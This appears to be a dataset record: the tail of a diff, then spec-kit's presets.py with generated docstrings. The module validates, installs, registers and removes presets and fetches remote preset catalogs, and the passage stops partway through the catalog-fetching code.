+ registered_commands: Dict mapping agent names to command name lists
+ project_root: Path to project root
+ """
for agent_name, cmd_names in registered_commands.items():
if agent_name not in self.AGENT_CONFIGS:
continue
@@ -323,4 +431,4 @@ if agent_name == "copilot":
prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
if prompt_file.exists():
- prompt_file.unlink()+ prompt_file.unlink()
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/agents.py |
Generate descriptive docstrings automatically |
import copy
import json
import hashlib
import os
import tempfile
import zipfile
import shutil
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Dict, List, Any
from datetime import datetime, timezone
import re
import yaml
from packaging import version as pkg_version
from packaging.specifiers import SpecifierSet, InvalidSpecifier
from .extensions import ExtensionRegistry, normalize_priority
@dataclass
class PresetCatalogEntry:
    """One catalog source in the preset catalog stack."""

    # Catalog JSON URL.
    url: str
    # Human-readable catalog name.
    name: str
    # Precedence key — presumably lower number wins, mirroring the extension
    # catalog stack; confirm against consuming code.
    priority: int
    # Whether installing presets from this catalog is permitted.
    install_allowed: bool
    # Optional free-text description of the catalog.
    description: str = ""
class PresetError(Exception):
    """Base class for all preset-related errors."""
    pass


class PresetValidationError(PresetError):
    """Raised when a preset manifest fails schema or format validation."""
    pass


class PresetCompatibilityError(PresetError):
    """Raised for preset compatibility failures.

    NOTE(review): raise sites are outside this chunk — presumably version
    mismatches against requires.speckit_version; confirm.
    """
    pass


# Allowed values for provides.templates[].type in a preset manifest.
VALID_PRESET_TEMPLATE_TYPES = {"template", "command", "script"}
class PresetManifest:
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "preset", "requires", "provides"]
def __init__(self, manifest_path: Path):
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
except yaml.YAMLError as e:
raise PresetValidationError(f"Invalid YAML in {path}: {e}")
except FileNotFoundError:
raise PresetValidationError(f"Manifest not found: {path}")
def _validate(self):
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
raise PresetValidationError(f"Missing required field: {field}")
# Validate schema version
if self.data["schema_version"] != self.SCHEMA_VERSION:
raise PresetValidationError(
f"Unsupported schema version: {self.data['schema_version']} "
f"(expected {self.SCHEMA_VERSION})"
)
# Validate preset metadata
pack = self.data["preset"]
for field in ["id", "name", "version", "description"]:
if field not in pack:
raise PresetValidationError(f"Missing preset.{field}")
# Validate pack ID format
if not re.match(r'^[a-z0-9-]+$', pack["id"]):
raise PresetValidationError(
f"Invalid preset ID '{pack['id']}': "
"must be lowercase alphanumeric with hyphens only"
)
# Validate semantic version
try:
pkg_version.Version(pack["version"])
except pkg_version.InvalidVersion:
raise PresetValidationError(f"Invalid version: {pack['version']}")
# Validate requires section
requires = self.data["requires"]
if "speckit_version" not in requires:
raise PresetValidationError("Missing requires.speckit_version")
# Validate provides section
provides = self.data["provides"]
if "templates" not in provides or not provides["templates"]:
raise PresetValidationError(
"Preset must provide at least one template"
)
# Validate templates
for tmpl in provides["templates"]:
if "type" not in tmpl or "name" not in tmpl or "file" not in tmpl:
raise PresetValidationError(
"Template missing 'type', 'name', or 'file'"
)
if tmpl["type"] not in VALID_PRESET_TEMPLATE_TYPES:
raise PresetValidationError(
f"Invalid template type '{tmpl['type']}': "
f"must be one of {sorted(VALID_PRESET_TEMPLATE_TYPES)}"
)
# Validate file path safety: must be relative, no parent traversal
file_path = tmpl["file"]
normalized = os.path.normpath(file_path)
if os.path.isabs(normalized) or normalized.startswith(".."):
raise PresetValidationError(
f"Invalid template file path '{file_path}': "
"must be a relative path within the preset directory"
)
# Validate template name format
if tmpl["type"] == "command":
# Commands use dot notation (e.g. speckit.specify)
if not re.match(r'^[a-z0-9.-]+$', tmpl["name"]):
raise PresetValidationError(
f"Invalid command name '{tmpl['name']}': "
"must be lowercase alphanumeric with hyphens and dots only"
)
else:
if not re.match(r'^[a-z0-9-]+$', tmpl["name"]):
raise PresetValidationError(
f"Invalid template name '{tmpl['name']}': "
"must be lowercase alphanumeric with hyphens only"
)
    @property
    def id(self) -> str:
        """Return the preset ID.

        Guaranteed present: ``_validate()`` rejects manifests missing
        ``preset.id`` at construction time, so this never raises KeyError
        on a successfully constructed manifest.
        """
        return self.data["preset"]["id"]
    @property
    def name(self) -> str:
        """Return the human-readable preset name (required, validated at load)."""
        return self.data["preset"]["name"]
    @property
    def version(self) -> str:
        """Return the preset's semantic version string.

        Validation guarantees this parses as a PEP 440 version.
        """
        return self.data["preset"]["version"]
    @property
    def description(self) -> str:
        """Return the preset description (required, validated at load)."""
        return self.data["preset"]["description"]
    @property
    def author(self) -> str:
        """Return the preset author.

        Edge case: ``author`` is optional in the manifest; returns an
        empty string rather than raising when the field is absent.
        """
        return self.data["preset"].get("author", "")
    @property
    def requires_speckit_version(self) -> str:
        """Return the required spec-kit version specifier string.

        Presence is validated at load; the *content* of the specifier is
        only checked later (see ``PresetManager.check_compatibility``),
        so this may still be an invalid specifier expression.
        """
        return self.data["requires"]["speckit_version"]
    @property
    def templates(self) -> List[Dict[str, Any]]:
        """Return the list of provided template entries.

        Validation guarantees at least one entry, each with ``type``,
        ``name`` and ``file`` keys and a safe relative ``file`` path.
        """
        return self.data["provides"]["templates"]
    @property
    def tags(self) -> List[str]:
        """Return preset tags.

        Edge case: ``tags`` is optional at the manifest root; returns an
        empty list when the key is absent.
        """
        return self.data.get("tags", [])
    def get_hash(self) -> str:
        """Return ``sha256:<hexdigest>`` of the raw manifest file bytes.

        Edge cases: the file is re-read from disk on every call, so the
        hash reflects current on-disk content, not the parsed
        ``self.data``; raises OSError if the manifest was deleted or
        became unreadable after loading.
        """
        with open(self.path, 'rb') as f:
            return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class PresetRegistry:
    """JSON-backed registry of installed presets (``.registry`` file).

    Designed to survive a missing or corrupted registry file: load
    failures fall back to an empty registry instead of raising.
    """
    # Registry file name inside the presets directory.
    REGISTRY_FILE = ".registry"
    # Schema version written into freshly created registries.
    SCHEMA_VERSION = "1.0"
    def __init__(self, packs_dir: Path):
        """Bind to *packs_dir* and eagerly load the registry.

        Edge case: *packs_dir* need not exist yet — ``_load()`` returns
        an empty in-memory registry and the directory is only created on
        the first ``_save()``.
        """
        self.packs_dir = packs_dir
        self.registry_path = packs_dir / self.REGISTRY_FILE
        self.data = self._load()
    def _load(self) -> dict:
        """Load registry data from disk.

        Edge cases: a missing file, invalid JSON, or a file that
        disappears between the existence check and the read (race) all
        yield a fresh empty registry rather than an exception.
        """
        if not self.registry_path.exists():
            return {
                "schema_version": self.SCHEMA_VERSION,
                "presets": {}
            }
        try:
            with open(self.registry_path, 'r') as f:
                return json.load(f)
        except (json.JSONDecodeError, FileNotFoundError):
            # Corrupted or concurrently removed registry: start fresh.
            return {
                "schema_version": self.SCHEMA_VERSION,
                "presets": {}
            }
    def _save(self):
        """Persist registry to disk, creating the directory if needed."""
        self.packs_dir.mkdir(parents=True, exist_ok=True)
        with open(self.registry_path, 'w') as f:
            json.dump(self.data, f, indent=2)
    def add(self, pack_id: str, metadata: dict):
        """Add (or replace) a preset entry and persist immediately.

        Edge case: any ``installed_at`` supplied by the caller in
        *metadata* is overwritten with the current UTC timestamp.
        """
        self.data["presets"][pack_id] = {
            **metadata,
            "installed_at": datetime.now(timezone.utc).isoformat()
        }
        self._save()
    def remove(self, pack_id: str):
        """Remove a preset entry if present.

        Edge case: unknown *pack_id* is a silent no-op and the registry
        file is not rewritten.
        """
        if pack_id in self.data["presets"]:
            del self.data["presets"][pack_id]
            self._save()
    def update(self, pack_id: str, updates: dict):
        """Merge *updates* into an existing preset entry and persist.

        Raises:
            KeyError: if *pack_id* is not registered.

        Edge cases: a corrupted (non-dict) existing entry is treated as
        empty; the original ``installed_at`` is preserved based on key
        *presence* (even when falsy), and a caller-supplied
        ``installed_at`` is dropped when the entry never had one.
        """
        if pack_id not in self.data["presets"]:
            raise KeyError(f"Preset '{pack_id}' not found in registry")
        existing = self.data["presets"][pack_id]
        # Handle corrupted registry entries (e.g., string/list instead of dict)
        if not isinstance(existing, dict):
            existing = {}
        # Merge: existing fields preserved, new fields override
        merged = {**existing, **updates}
        # Always preserve original installed_at based on key existence, not truthiness,
        # to handle cases where the field exists but may be falsy (legacy/corruption)
        if "installed_at" in existing:
            merged["installed_at"] = existing["installed_at"]
        else:
            # If not present in existing, explicitly remove from merged if caller provided it
            merged.pop("installed_at", None)
        self.data["presets"][pack_id] = merged
        self._save()
    def get(self, pack_id: str) -> Optional[dict]:
        """Return the entry for *pack_id*, or None when not registered."""
        return self.data["presets"].get(pack_id)
    def list(self) -> Dict[str, dict]:
        """Return the mapping of all registered presets.

        NOTE(review): this returns the live internal dict — mutating the
        result mutates registry state. Callers should treat it read-only.
        """
        return self.data["presets"]
    def list_by_priority(self) -> List[tuple]:
        """Return ``(pack_id, metadata)`` pairs sorted by priority.

        Edge cases: a non-dict ``presets`` map is treated as empty;
        entries whose metadata is not a dict are skipped; metadata is
        deep-copied so callers cannot mutate registry state; missing or
        invalid priorities are normalized (default 10); ties are broken
        deterministically by pack id.
        """
        packs = self.data.get("presets", {}) or {}
        if not isinstance(packs, dict):
            packs = {}
        sortable_packs = []
        for pack_id, meta in packs.items():
            if not isinstance(meta, dict):
                continue
            metadata_copy = copy.deepcopy(meta)
            metadata_copy["priority"] = normalize_priority(metadata_copy.get("priority", 10))
            sortable_packs.append((pack_id, metadata_copy))
        return sorted(
            sortable_packs,
            key=lambda item: (item[1]["priority"], item[0]),
        )
    def is_installed(self, pack_id: str) -> bool:
        """Return True when *pack_id* has a registry entry."""
        return pack_id in self.data["presets"]
class PresetManager:
    """Installs, removes, and inspects presets under ``.specify/presets/``.

    Side-effecting operations degrade gracefully: agent/skill
    registration becomes a no-op when the optional integrations are
    unavailable, and corrupted installed presets are reported rather
    than crashing listings.
    """
    def __init__(self, project_root: Path):
        """Bind the manager to *project_root*.

        Edge case: no filesystem writes happen here; a nonexistent
        presets directory is tolerated until the first install.
        """
        self.project_root = project_root
        self.presets_dir = project_root / ".specify" / "presets"
        self.registry = PresetRegistry(self.presets_dir)
    def check_compatibility(
        self,
        manifest: PresetManifest,
        speckit_version: str
    ) -> bool:
        """Verify *speckit_version* satisfies the manifest requirement.

        Returns True on success.

        Raises:
            PresetCompatibilityError: when the current version is outside
                the required range, or the specifier string is malformed.

        Edge cases: the range-mismatch error is raised inside the ``try``
        but deliberately NOT swallowed — the ``except`` clause only
        catches ``InvalidSpecifier``. A malformed *speckit_version*
        itself raises packaging's InvalidVersion, which propagates
        unchanged.
        """
        required = manifest.requires_speckit_version
        current = pkg_version.Version(speckit_version)
        try:
            specifier = SpecifierSet(required)
            if current not in specifier:
                raise PresetCompatibilityError(
                    f"Preset requires spec-kit {required}, "
                    f"but {speckit_version} is installed.\n"
                    f"Upgrade spec-kit with: uv tool install specify-cli --force"
                )
        except InvalidSpecifier:
            raise PresetCompatibilityError(
                f"Invalid version specifier: {required}"
            )
        return True
    def _register_commands(
        self,
        manifest: PresetManifest,
        preset_dir: Path
    ) -> Dict[str, List[str]]:
        """Register the preset's command templates with AI agents.

        Returns a mapping of agent -> registered command names.

        Edge cases: returns ``{}`` when the manifest has no command
        templates, when every command is filtered out (extension override
        whose extension directory is absent), or when the optional
        ``agents`` module cannot be imported.
        """
        command_templates = [
            t for t in manifest.templates if t.get("type") == "command"
        ]
        if not command_templates:
            return {}
        # Filter out extension command overrides if the extension isn't installed.
        # Command names follow the pattern: speckit.<ext-id>.<cmd-name>
        # Core commands (e.g. speckit.specify) have only one dot — always register.
        extensions_dir = self.project_root / ".specify" / "extensions"
        filtered = []
        for cmd in command_templates:
            parts = cmd["name"].split(".")
            if len(parts) >= 3 and parts[0] == "speckit":
                ext_id = parts[1]
                if not (extensions_dir / ext_id).is_dir():
                    continue
            filtered.append(cmd)
        if not filtered:
            return {}
        try:
            from .agents import CommandRegistrar
        except ImportError:
            # Agent integration not available — registration is optional.
            return {}
        registrar = CommandRegistrar()
        return registrar.register_commands_for_all_agents(
            filtered, manifest.id, preset_dir, self.project_root
        )
    def _unregister_commands(self, registered_commands: Dict[str, List[str]]) -> None:
        """Undo command registration for all agents.

        Edge case: silently no-ops when the ``agents`` module is absent,
        mirroring ``_register_commands``.
        """
        try:
            from .agents import CommandRegistrar
        except ImportError:
            return
        registrar = CommandRegistrar()
        registrar.unregister_commands(registered_commands, self.project_root)
    def _get_skills_dir(self) -> Optional[Path]:
        """Return the agent skills directory, or None when unavailable.

        Edge cases (each returns None): ``ai_skills`` not enabled in the
        saved init options, no agent selected, or the resolved skills
        directory does not exist on disk.
        """
        from . import load_init_options, _get_skills_dir
        opts = load_init_options(self.project_root)
        if not opts.get("ai_skills"):
            return None
        agent = opts.get("ai")
        if not agent:
            return None
        skills_dir = _get_skills_dir(self.project_root, agent)
        if not skills_dir.is_dir():
            return None
        return skills_dir
    def _register_skills(
        self,
        manifest: "PresetManifest",
        preset_dir: Path,
    ) -> List[str]:
        """Overwrite existing SKILL.md files with preset command content.

        Returns the list of skill names that were rewritten.

        Edge cases: returns ``[]`` when the preset has no command
        templates, all are filtered out, or skills are not enabled.
        Per-command skips: missing source file, or skill directory not
        already present (skills are only *updated*, never created here —
        creation requires ``--ai-skills`` at init). YAML frontmatter that
        is not a mapping is treated as empty; a file starting with
        ``---`` but lacking a closing delimiter is used whole as body.
        """
        command_templates = [
            t for t in manifest.templates if t.get("type") == "command"
        ]
        if not command_templates:
            return []
        # Filter out extension command overrides if the extension isn't installed,
        # matching the same logic used by _register_commands().
        extensions_dir = self.project_root / ".specify" / "extensions"
        filtered = []
        for cmd in command_templates:
            parts = cmd["name"].split(".")
            if len(parts) >= 3 and parts[0] == "speckit":
                ext_id = parts[1]
                if not (extensions_dir / ext_id).is_dir():
                    continue
            filtered.append(cmd)
        if not filtered:
            return []
        skills_dir = self._get_skills_dir()
        if not skills_dir:
            return []
        from . import SKILL_DESCRIPTIONS, load_init_options
        opts = load_init_options(self.project_root)
        selected_ai = opts.get("ai", "")
        written: List[str] = []
        for cmd_tmpl in filtered:
            cmd_name = cmd_tmpl["name"]
            cmd_file_rel = cmd_tmpl["file"]
            source_file = preset_dir / cmd_file_rel
            if not source_file.exists():
                continue
            # Derive the short command name (e.g. "specify" from "speckit.specify")
            short_name = cmd_name
            if short_name.startswith("speckit."):
                short_name = short_name[len("speckit."):]
            # Kimi CLI discovers skills by directory name and invokes them as
            # /skill:<name> — use dot separator to match packaging convention.
            if selected_ai == "kimi":
                skill_name = f"speckit.{short_name}"
            else:
                skill_name = f"speckit-{short_name}"
            # Only overwrite if the skill already exists (i.e. --ai-skills was used)
            skill_subdir = skills_dir / skill_name
            if not skill_subdir.exists():
                continue
            # Parse the command file
            content = source_file.read_text(encoding="utf-8")
            if content.startswith("---"):
                parts = content.split("---", 2)
                if len(parts) >= 3:
                    frontmatter = yaml.safe_load(parts[1])
                    if not isinstance(frontmatter, dict):
                        frontmatter = {}
                    body = parts[2].strip()
                else:
                    # Opening '---' without a closing delimiter: no frontmatter.
                    frontmatter = {}
                    body = content
            else:
                frontmatter = {}
                body = content
            original_desc = frontmatter.get("description", "")
            enhanced_desc = SKILL_DESCRIPTIONS.get(
                short_name,
                original_desc or f"Spec-kit workflow command: {short_name}",
            )
            frontmatter_data = {
                "name": skill_name,
                "description": enhanced_desc,
                "compatibility": "Requires spec-kit project structure with .specify/ directory",
                "metadata": {
                    "author": "github-spec-kit",
                    "source": f"preset:{manifest.id}",
                },
            }
            frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
            skill_content = (
                f"---\n"
                f"{frontmatter_text}\n"
                f"---\n\n"
                f"# Speckit {short_name.title()} Skill\n\n"
                f"{body}\n"
            )
            skill_file = skill_subdir / "SKILL.md"
            skill_file.write_text(skill_content, encoding="utf-8")
            written.append(skill_name)
        return written
    def _unregister_skills(self, skill_names: List[str], preset_dir: Path) -> None:
        """Restore or remove skills previously rewritten by a preset.

        Edge cases: empty *skill_names* or unavailable skills directory
        are no-ops; skills whose SKILL.md vanished are skipped. If the
        core command template exists the skill content is regenerated
        from it; otherwise the whole skill directory is deleted (the
        skill only existed because of the preset).
        """
        if not skill_names:
            return
        skills_dir = self._get_skills_dir()
        if not skills_dir:
            return
        from . import SKILL_DESCRIPTIONS
        # Locate core command templates from the project's installed templates
        core_templates_dir = self.project_root / ".specify" / "templates" / "commands"
        for skill_name in skill_names:
            # Derive command name from skill name (speckit-specify -> specify)
            short_name = skill_name
            if short_name.startswith("speckit-"):
                short_name = short_name[len("speckit-"):]
            elif short_name.startswith("speckit."):
                short_name = short_name[len("speckit."):]
            skill_subdir = skills_dir / skill_name
            skill_file = skill_subdir / "SKILL.md"
            if not skill_file.exists():
                continue
            # Try to find the core command template
            core_file = core_templates_dir / f"{short_name}.md" if core_templates_dir.exists() else None
            if core_file and not core_file.exists():
                core_file = None
            if core_file:
                # Restore from core template
                content = core_file.read_text(encoding="utf-8")
                if content.startswith("---"):
                    parts = content.split("---", 2)
                    if len(parts) >= 3:
                        frontmatter = yaml.safe_load(parts[1])
                        if not isinstance(frontmatter, dict):
                            frontmatter = {}
                        body = parts[2].strip()
                    else:
                        # Opening '---' without a closing delimiter: no frontmatter.
                        frontmatter = {}
                        body = content
                else:
                    frontmatter = {}
                    body = content
                original_desc = frontmatter.get("description", "")
                enhanced_desc = SKILL_DESCRIPTIONS.get(
                    short_name,
                    original_desc or f"Spec-kit workflow command: {short_name}",
                )
                frontmatter_data = {
                    "name": skill_name,
                    "description": enhanced_desc,
                    "compatibility": "Requires spec-kit project structure with .specify/ directory",
                    "metadata": {
                        "author": "github-spec-kit",
                        "source": f"templates/commands/{short_name}.md",
                    },
                }
                frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
                skill_content = (
                    f"---\n"
                    f"{frontmatter_text}\n"
                    f"---\n\n"
                    f"# Speckit {short_name.title()} Skill\n\n"
                    f"{body}\n"
                )
                skill_file.write_text(skill_content, encoding="utf-8")
            else:
                # No core template — remove the skill entirely
                shutil.rmtree(skill_subdir)
    def install_from_directory(
        self,
        source_dir: Path,
        speckit_version: str,
        priority: int = 10,
    ) -> PresetManifest:
        """Install a preset from an on-disk directory.

        Returns the validated manifest.

        Raises:
            PresetValidationError: priority < 1 or invalid manifest.
            PresetCompatibilityError: version requirement not met.
            PresetError: preset with the same ID already installed.

        Edge case: a leftover destination directory (e.g. from a failed
        earlier install whose registry entry was lost) is removed before
        copying.
        """
        # Validate priority
        if priority < 1:
            raise PresetValidationError("Priority must be a positive integer (1 or higher)")
        manifest_path = source_dir / "preset.yml"
        manifest = PresetManifest(manifest_path)
        self.check_compatibility(manifest, speckit_version)
        if self.registry.is_installed(manifest.id):
            raise PresetError(
                f"Preset '{manifest.id}' is already installed. "
                f"Use 'specify preset remove {manifest.id}' first."
            )
        dest_dir = self.presets_dir / manifest.id
        if dest_dir.exists():
            shutil.rmtree(dest_dir)
        shutil.copytree(source_dir, dest_dir)
        # Register command overrides with AI agents
        registered_commands = self._register_commands(manifest, dest_dir)
        # Update corresponding skills when --ai-skills was previously used
        registered_skills = self._register_skills(manifest, dest_dir)
        self.registry.add(manifest.id, {
            "version": manifest.version,
            "source": "local",
            "manifest_hash": manifest.get_hash(),
            "enabled": True,
            "priority": priority,
            "registered_commands": registered_commands,
            "registered_skills": registered_skills,
        })
        return manifest
    def install_from_zip(
        self,
        zip_path: Path,
        speckit_version: str,
        priority: int = 10,
    ) -> PresetManifest:
        """Install a preset from a ZIP archive.

        Raises:
            PresetValidationError: priority < 1, an archive member would
                escape the extraction directory (zip-slip), or no
                ``preset.yml`` can be located.

        Edge case: when ``preset.yml`` is not at the archive root but the
        archive contains exactly one top-level directory, that directory
        is used as the preset root (common "wrapped" archive layout).
        """
        # Validate priority early
        if priority < 1:
            raise PresetValidationError("Priority must be a positive integer (1 or higher)")
        with tempfile.TemporaryDirectory() as tmpdir:
            temp_path = Path(tmpdir)
            with zipfile.ZipFile(zip_path, 'r') as zf:
                temp_path_resolved = temp_path.resolve()
                # Reject any member whose resolved path escapes the temp dir
                # before extracting anything.
                for member in zf.namelist():
                    member_path = (temp_path / member).resolve()
                    try:
                        member_path.relative_to(temp_path_resolved)
                    except ValueError:
                        raise PresetValidationError(
                            f"Unsafe path in ZIP archive: {member} "
                            "(potential path traversal)"
                        )
                zf.extractall(temp_path)
            pack_dir = temp_path
            manifest_path = pack_dir / "preset.yml"
            if not manifest_path.exists():
                subdirs = [d for d in temp_path.iterdir() if d.is_dir()]
                if len(subdirs) == 1:
                    pack_dir = subdirs[0]
                    manifest_path = pack_dir / "preset.yml"
            if not manifest_path.exists():
                raise PresetValidationError(
                    "No preset.yml found in ZIP file"
                )
            return self.install_from_directory(pack_dir, speckit_version, priority)
    def remove(self, pack_id: str) -> bool:
        """Remove an installed preset; return True when something was removed.

        Edge cases: returns False when not registered; tolerates a
        registry entry whose metadata is None/missing and a preset
        directory that has already been deleted from disk.
        """
        if not self.registry.is_installed(pack_id):
            return False
        # Unregister commands from AI agents
        metadata = self.registry.get(pack_id)
        registered_commands = metadata.get("registered_commands", {}) if metadata else {}
        if registered_commands:
            self._unregister_commands(registered_commands)
        # Restore original skills when preset is removed
        registered_skills = metadata.get("registered_skills", []) if metadata else []
        pack_dir = self.presets_dir / pack_id
        if registered_skills:
            self._unregister_skills(registered_skills, pack_dir)
        if pack_dir.exists():
            shutil.rmtree(pack_dir)
        self.registry.remove(pack_id)
        return True
    def list_installed(self) -> List[Dict[str, Any]]:
        """Return a summary dict for every registered preset.

        Edge cases: non-dict registry metadata is coerced to ``{}``; a
        preset whose on-disk manifest is missing or invalid still yields
        a placeholder row flagged as corrupted instead of aborting the
        whole listing.
        """
        result = []
        for pack_id, metadata in self.registry.list().items():
            # Ensure metadata is a dictionary to avoid AttributeError when using .get()
            if not isinstance(metadata, dict):
                metadata = {}
            pack_dir = self.presets_dir / pack_id
            manifest_path = pack_dir / "preset.yml"
            try:
                manifest = PresetManifest(manifest_path)
                result.append({
                    "id": pack_id,
                    "name": manifest.name,
                    "version": metadata.get("version", manifest.version),
                    "description": manifest.description,
                    "enabled": metadata.get("enabled", True),
                    "installed_at": metadata.get("installed_at"),
                    "template_count": len(manifest.templates),
                    "tags": manifest.tags,
                    "priority": normalize_priority(metadata.get("priority")),
                })
            except PresetValidationError:
                result.append({
                    "id": pack_id,
                    "name": pack_id,
                    "version": metadata.get("version", "unknown"),
                    "description": "⚠️ Corrupted preset",
                    "enabled": False,
                    "installed_at": metadata.get("installed_at"),
                    "template_count": 0,
                    "tags": [],
                    "priority": normalize_priority(metadata.get("priority")),
                })
        return result
    def get_pack(self, pack_id: str) -> Optional[PresetManifest]:
        """Return the manifest for an installed preset.

        Edge cases: returns None (rather than raising) both when the
        preset is not registered and when its manifest fails validation.
        """
        if not self.registry.is_installed(pack_id):
            return None
        pack_dir = self.presets_dir / pack_id
        manifest_path = pack_dir / "preset.yml"
        try:
            return PresetManifest(manifest_path)
        except PresetValidationError:
            return None
class PresetCatalog:
    """Fetches, caches, merges, and queries remote preset catalogs.

    Catalog sources are resolved in order: environment variable,
    project-level config, user-level config, then the built-in default
    stack. Each catalog is cached on disk for ``CACHE_DURATION`` seconds.
    """
    DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.json"
    COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.community.json"
    CACHE_DURATION = 3600  # 1 hour in seconds
    def __init__(self, project_root: Path):
        """Bind to *project_root*; no network or disk access happens here."""
        self.project_root = project_root
        self.presets_dir = project_root / ".specify" / "presets"
        self.cache_dir = self.presets_dir / ".cache"
        self.cache_file = self.cache_dir / "catalog.json"
        self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
    def _validate_catalog_url(self, url: str) -> None:
        """Reject catalog URLs that are not HTTPS (or HTTP to localhost).

        Raises:
            PresetValidationError: non-HTTPS scheme (except localhost
                HTTP) or a URL with no host component.
        """
        from urllib.parse import urlparse
        parsed = urlparse(url)
        is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
        if parsed.scheme != "https" and not (
            parsed.scheme == "http" and is_localhost
        ):
            raise PresetValidationError(
                f"Catalog URL must use HTTPS (got {parsed.scheme}://). "
                "HTTP is only allowed for localhost."
            )
        if not parsed.netloc:
            raise PresetValidationError(
                "Catalog URL must be a valid URL with a host."
            )
    def _load_catalog_config(self, config_path: Path) -> Optional[List[PresetCatalogEntry]]:
        """Load catalog entries from a YAML config file.

        Returns None when the file is absent, has no ``catalogs`` key, or
        every entry lacks a URL — callers fall through to the next
        config level. Entries with an empty URL are skipped; string
        ``install_allowed`` values like "true"/"yes"/"1" are accepted.

        Raises:
            PresetValidationError: unreadable file, non-mapping root,
                non-list ``catalogs``, non-mapping entry, or a
                non-integer priority.
        """
        if not config_path.exists():
            return None
        try:
            data = yaml.safe_load(config_path.read_text()) or {}
        except (yaml.YAMLError, OSError) as e:
            raise PresetValidationError(
                f"Failed to read catalog config {config_path}: {e}"
            )
        if not isinstance(data, dict):
            raise PresetValidationError(
                f"Invalid catalog config {config_path}: expected a mapping at root, got {type(data).__name__}"
            )
        catalogs_data = data.get("catalogs", [])
        if not catalogs_data:
            return None
        if not isinstance(catalogs_data, list):
            raise PresetValidationError(
                f"Invalid catalog config: 'catalogs' must be a list, got {type(catalogs_data).__name__}"
            )
        entries: List[PresetCatalogEntry] = []
        for idx, item in enumerate(catalogs_data):
            if not isinstance(item, dict):
                raise PresetValidationError(
                    f"Invalid catalog entry at index {idx}: expected a mapping, got {type(item).__name__}"
                )
            url = str(item.get("url", "")).strip()
            if not url:
                continue
            self._validate_catalog_url(url)
            try:
                priority = int(item.get("priority", idx + 1))
            except (TypeError, ValueError):
                raise PresetValidationError(
                    f"Invalid priority for catalog '{item.get('name', idx + 1)}': "
                    f"expected integer, got {item.get('priority')!r}"
                )
            raw_install = item.get("install_allowed", False)
            if isinstance(raw_install, str):
                install_allowed = raw_install.strip().lower() in ("true", "yes", "1")
            else:
                install_allowed = bool(raw_install)
            entries.append(PresetCatalogEntry(
                url=url,
                name=str(item.get("name", f"catalog-{idx + 1}")),
                priority=priority,
                install_allowed=install_allowed,
                description=str(item.get("description", "")),
            ))
        entries.sort(key=lambda e: e.priority)
        return entries if entries else None
    def get_active_catalogs(self) -> List[PresetCatalogEntry]:
        """Resolve the active catalog stack.

        Precedence: SPECKIT_PRESET_CATALOG_URL env var (replaces all),
        then project config, then user config, then built-in defaults.
        A non-default env URL prints a one-time trust warning to stderr.
        """
        import sys
        # 1. SPECKIT_PRESET_CATALOG_URL env var replaces all defaults
        if env_value := os.environ.get("SPECKIT_PRESET_CATALOG_URL"):
            catalog_url = env_value.strip()
            self._validate_catalog_url(catalog_url)
            if catalog_url != self.DEFAULT_CATALOG_URL:
                if not getattr(self, "_non_default_catalog_warning_shown", False):
                    print(
                        "Warning: Using non-default preset catalog. "
                        "Only use catalogs from sources you trust.",
                        file=sys.stderr,
                    )
                    self._non_default_catalog_warning_shown = True
            return [PresetCatalogEntry(url=catalog_url, name="custom", priority=1, install_allowed=True, description="Custom catalog via SPECKIT_PRESET_CATALOG_URL")]
        # 2. Project-level config overrides all defaults
        project_config_path = self.project_root / ".specify" / "preset-catalogs.yml"
        catalogs = self._load_catalog_config(project_config_path)
        if catalogs is not None:
            return catalogs
        # 3. User-level config
        user_config_path = Path.home() / ".specify" / "preset-catalogs.yml"
        catalogs = self._load_catalog_config(user_config_path)
        if catalogs is not None:
            return catalogs
        # 4. Built-in default stack
        return [
            PresetCatalogEntry(url=self.DEFAULT_CATALOG_URL, name="default", priority=1, install_allowed=True, description="Built-in catalog of installable presets"),
            PresetCatalogEntry(url=self.COMMUNITY_CATALOG_URL, name="community", priority=2, install_allowed=False, description="Community-contributed presets (discovery only)"),
        ]
    def get_catalog_url(self) -> str:
        """Return the highest-priority catalog URL (default if none active)."""
        active = self.get_active_catalogs()
        return active[0].url if active else self.DEFAULT_CATALOG_URL
    def _get_cache_paths(self, url: str):
        """Return (cache_file, metadata_file) for *url*.

        Edge case: the default catalog keeps the legacy fixed file names;
        every other URL gets hash-derived names so catalogs never
        clobber each other's caches.
        """
        if url == self.DEFAULT_CATALOG_URL:
            return self.cache_file, self.cache_metadata_file
        url_hash = hashlib.sha256(url.encode()).hexdigest()[:16]
        return (
            self.cache_dir / f"catalog-{url_hash}.json",
            self.cache_dir / f"catalog-{url_hash}-metadata.json",
        )
    def _is_url_cache_valid(self, url: str) -> bool:
        """Return True when the cache for *url* exists and is fresh.

        Edge cases: missing files, unparsable metadata, or a malformed
        timestamp all report False (forcing a refetch). Naive timestamps
        are assumed UTC.
        """
        cache_file, metadata_file = self._get_cache_paths(url)
        if not cache_file.exists() or not metadata_file.exists():
            return False
        try:
            metadata = json.loads(metadata_file.read_text())
            cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
            if cached_at.tzinfo is None:
                cached_at = cached_at.replace(tzinfo=timezone.utc)
            age_seconds = (
                datetime.now(timezone.utc) - cached_at
            ).total_seconds()
            return age_seconds < self.CACHE_DURATION
        except (json.JSONDecodeError, ValueError, KeyError, TypeError):
            return False
    def _fetch_single_catalog(self, entry: PresetCatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
        """Fetch one catalog, using the on-disk cache when fresh.

        Edge case: a valid-looking but unparsable cache file falls
        through to a network fetch instead of raising.

        Raises:
            PresetError: malformed catalog payload or any fetch failure.
        """
        cache_file, metadata_file = self._get_cache_paths(entry.url)
